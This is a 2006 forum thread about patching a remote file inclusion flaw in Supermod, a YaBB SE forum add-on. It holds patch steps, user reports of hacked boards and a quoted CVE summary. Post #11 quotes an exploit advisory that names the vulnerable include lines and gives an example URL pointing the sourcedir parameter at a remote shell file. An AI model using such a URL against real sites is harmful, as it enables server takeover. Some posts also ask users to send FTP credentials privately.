#1 By: webmaster Subject:Security Update Action Time: 26.Aug.06 20:18:26

Please be advised that a new exploitable security alert has been posted that may effect different UNIX based host installations of Supermod. This exploit has not been validated on WIN servers at this time, but I would recommend that you follow the following instructions regardless.

Immediate action that you can do to safeguard against this exploit is to do the following:

Issue:
YabbSE Remote Code Execution Vulnerability

Affects: All released versions of Supermod

Reference:
www.securiteam.com/unixfocus/5...5JP0R2K8US.html

Move the following files into ./Sources:

Reminder.php
News.php
Printpage.php

Open the following file into your favorite text editor:
File: Index.php

Code:

[look for]
'reminder' => array("Reminder.php", ''),
[replace]
'reminder' => array("$sourcedir/Reminder.php", ''),

[look for]
'news' => array("News.php", ''),
[replace]
'news' => array("$sourcedir/News.php", ''),

[look for]
'printpage' => array("Printpage.php", ''),
[replace]
'printpage' => array("$sourcedir/Printpage.php", ''),

[/save and close file]

Open the following file in your favorite text editor:

File: /Sources/News.php

[search for]
global $scripturl, $db_prefix, $txt, $db_name, $db_server, $db_user, $db_passwd, $db_connect, $cgi, $gimagesdir, $imagesdir, $board, $limit, $template, $ext, $locale, $timeformatstring, $yytitle;

[change]
global $dbcon, $boarddir, $scripturl, $db_prefix, $txt, $db_name, $db_server, $db_user, $db_passwd, $db_connect, $cgi, $gimagesdir, $imagesdir, $board, $limit, $template, $ext, $locale, $timeformatstring, $yytitle;

[search for]
// Connect to the database - either pconnect or std - Gxx
if (isset($db_connect) && $db_connect == 1)
{
???$dbcon = mysql_pconnect($db_server, $db_user, $db_passwd) or die(mysql_error());
???mysql_select_db($db_name) or die(mysql_error());
}
else
{
???$dbcon = mysql_connect($db_server, $db_user, $db_passwd) or die(mysql_error());
???mysql_select_db($db_name) or die(mysql_error());
???$db_connect = 0;
}
[/search]

[remove all]

* OR FOR VERSIONS PRIOR TO 3.0*

[search for]
$dbcon = mysql_connect($db_server, $db_user, $db_passwd);
mysql_select_db ($db_name);

[remove all]

Continue, all versions:

[search for]

??????include('news_template.php');
???else
???{
??????if ($ext == null)
?????????include($template . '.php');
??????else
?????????include($template . '.' . $ext);
???}
[/search]

[change]
??????include("$boarddir/news_template.php");
[/change]

[remove]
???else
???{
??????if ($ext == null)
?????????include($template . '.php');
??????else
?????????include($template . '.' . $ext);
???}
[/remove]

Save file and exit editor.

More information may be posted in the future, please be advised to check this thread for any updates.

SM 5.0 development is in full progress and will contain all neccessary and known security corrections when released. If you need assistance to make these changes please IM me with your FTP account access information and I will assist you.

Little if any code changes in News.php has accurred since early releases of SM. With that in mind I have attached the file with these change in it for your convinience. It may or may not work, if it fails to do so make sure your news_template.php file is located in the forum root. If it still fails to do so then follow the above instructions for changing News.php.

Thank you,
Wiziwig.

#2 By: biggs Subject:Re:Security Update Action Time: 28.Aug.06 01:56:21

Link is not working but edits were very easy. Thanks Wiz!

#3 By: avenueb Subject:Security Update Action Time: 28.Aug.06 16:38:35

thanks for the quick response to this vulnerability..

please clarify from your notes

Code:

[search for]
// Connect to the database - either pconnect or std - Gxx
if (isset($db_connect) && $db_connect == 1)
{
$dbcon = mysql_pconnect($db_server, $db_user, $db_passwd) or die(mysql_error());
mysql_select_db($db_name) or die(mysql_error());
}
else
{
$dbcon = mysql_connect($db_server, $db_user, $db_passwd) or die(mysql_error());
mysql_select_db($db_name) or die(mysql_error());
$db_connect = 0;
}
[/search]

[remove all]

We should remove all of these lines of code from News.php?

#4 By: webmaster Subject:Security Update Action Time: 28.Aug.06 20:49:58

Yes, remove those lines of code..

#5 By: Scottb Subject:Re:Security Update Action Time: 28.Aug.06 22:14:29

Thanks for the update Wiz I'll spread the word.

#6 By: shak3 Subject:Re:Security Update Action Time: 16.Oct.06 16:20:10

Thanks for the update, my site got hit with an exploit of this kind

#7 By: Nox Subject:Re:Security Update Action Time: 17.Oct.06 00:32:15

Yeah, I got hit to - and I completely missed this. I bet it's the same thing...

#8 By: sharkey Subject:Security Update Action Time: 20.Oct.06 15:19:40

My board is being attacked also, is the above fix the same as the security vulnerability being reported here:
securitydot.net/xpl/exploits/v...85/exploit.html ??

#9 By: Guardian Subject:Re:Security Update Action Time: 21.Oct.06 04:03:16

Got hit too.

#10 By: AAA Subject:Security Update Action Time: 23.Oct.06 07:23:14

Last week our forum got hit for a second time. This fix was applied but they still got in. Not sure how this time, though.

#11 By: Datarunner Subject:Security Update Action Time: 23.Oct.06 14:50:24

Disable the attachment possibility for now.

I also recommend you to enable "Pre-Approve New User Registrations " (third-last line) under "Modify Supermod Settings" and let only those in about that you can be sure that they do not hack, if you have a small forum. You then have to manually register the person, after disabling the pre-approve new user registration. You also would need phpmyadmin (secured with a password, hopefully) for reading out the table pre_registration_members and carrying through the registrations manually.
If you find time inform your users about the pre-registration information in the board usage information.

Wizwig, maybe we can put out a security update? A zip file with the altered php files, so-to-say a security update with the completely updated files.

This is going through the whole web:

They seem to upload a php file to the attachments path. I am not sure how on my board they could upload a php file although the file extension is disabled. Any ideas???

They then call up the file by calling Offline.php or alike (see below) and call the file then ...

Quote:

[DESCRIPTION] Remote file include vuln found by sZ [oct 09, 2006]
[SOFTWARE] Supermod 3.0 for yabb
[VENDOR URL] http://www.supermod.org
[DORK] YaBBSM V2.5.0 // Powered by YaBBSM V2.5.0 Based on YABB SE
[NOTES] greetz to: neo-vortex, sk0tie, icez, Solano College CIS students.

VULN:
Offline.php
include("$sourcedir/pclzip.lib.php");
They forgot to include settings.php, this file seems to not exist sometimes.

VULN:
Sources/Admin.php
include_once("$sourcedir/Recent.php");

VULN:
Sources/Offline.php
include_once("$sourcedir/Recent.php");

VULN:
content/portalshow.php
include_once "$sourcedir/Calendar.php";

[EXAMPLE] site.com/community/Offline.php...?sourcedir=http://shellurl.com/phpcommands.txt?

# ******* [2006-10

#12 By: avenueb Subject:Security Update Action Time: 23.Oct.06 20:40:47

In case anyone is interested

National Cyber-Alert System
Vulnerability Summary CVE-2006-5413
Original release date: 10/20/2006
Last revised: 10/23/2006
Source: US-CERT/NIST

Overview

Multiple PHP remote file inclusion vulnerabilities in SuperMod 3.0.0 for YABB (YaBBSM) allow remote attackers to execute arbitrary PHP code via a URL in the sourcedir parameter to (1) Offline.php, (2) Sources/Admin.php, (3) Sources/Offline.php, or (4) content/portalshow.php.

Impact

CVSS Severity: 7.0 (High)
Range: Remotely exploitable
Authentication: Not required to exploit
Impact Type: Provides unauthorized access

References to Advisories, Solutions, and Tools

External Source: XF (disclaimer)

Name: yabbsm-sourcedir-file-include(29559)

Hyperlink: http://xforce.iss.net/xforce/xfdb/29559

External Source: BID (disclaimer)

Name: 20570

Hyperlink: http://www.securityfocus.com/bid/20570

External Source: BID (disclaimer)

Name: 20568

Hyperlink: http://www.securityfocus.com/bid/20568

External Source: FRSIRT (disclaimer)

Name: ADV-2006-4042

Type: Advisory
Hyperlink: http://www.frsirt.com/english/advisories/2006/4042

External Source: SECUNIA (disclaimer)

Name: 22437

Type: Advisory
Hyperlink: http://secunia.com/advisories/22437

External Source: (disclaimer)

Hyperlink: http://milw0rm.com/exploits/2553

Vulnerable software and versions

SuperMod, SuperMod, 3.0.0

Technical Details

CVSS Base Score Vector: (AV:R/AC:L/Au:NR/C:P/I:P/A:P/B:N) (legend)

Vulnerability Type: Input Validation Error

CVE Standard Vulnerability Entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5413

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-5413

#13 By: AAA Subject:Security Update Action Time: 24.Oct.06 21:32:52

After over 3 yrs of using and supporting SM, with donations and referals, we've lost control of our site 3 times now to hackers, in the last 2 months. Two of the times our service provider has had to shut down SM because it was used for UCE and pishing, via SM.

We would like to continue using and supporting SM, but from the looks of it SM has come to a stand still as far as the avg user goes and is wide open for hackers.

Good luck fixing this and thanks for 3 good yrs.

#14 By: Datarunner Subject:Security Update Action Time: 25.Oct.06 12:15:49

AAA,
sad to hear... the development of Supermod has not stopped. It only seems on this forum it has.
I am going to program an update for this security vulnerability, so no one can use this hole anymore.
It will be out tomorrow or in 2 days, I hope. It's not really much to be changed.
The national cyber-alert systems always quotes one security hole - there is not more than 3,4 files involved with a small security hole. Unfortunately we received the news not any earlier. And I believe that Wiziwig has done a good job with the first security update, for which he really thoroughly informed and alarmed.

Datarunner

#15 By: Datarunner Subject:Security Update Action Time: 25.Oct.06 20:03:39

I have tried some ways to exploit Supermod but it does not seem to work. All this stuff seems to be absolutely nonsense.

AAA, it's a very sad situation. Could you send to me your ftp info, because I have to find out how they did it this time. I hope you keep a backup of your site.

Datarunner

#16 By: AAA Subject:Security Update Action Time: 25.Oct.06 20:59:03

Datarunner, I sent you an im.

I have no doubt that wiz did all he could when this first started. I have the upmost respect for his, yours and others work on SM and hope to see it continue.

The updating on SM has always been a headscratcher for me. I feel much like a caveman trying to do algebra when I look at php. And the possibilitiy of crashing the forum by making a mistake placing or editing any of it isn't something I am comfortable with.

#17 By: Datarunner Subject:Security Update Action Time: 27.Oct.06 16:07:06

You will get from me a security patch, where you only need to overwrite the old files with new ones. It will hopefully be out by end of this weekend. I will then have to write to several supermod users to update.

Thanks for the im-information....

Datarunner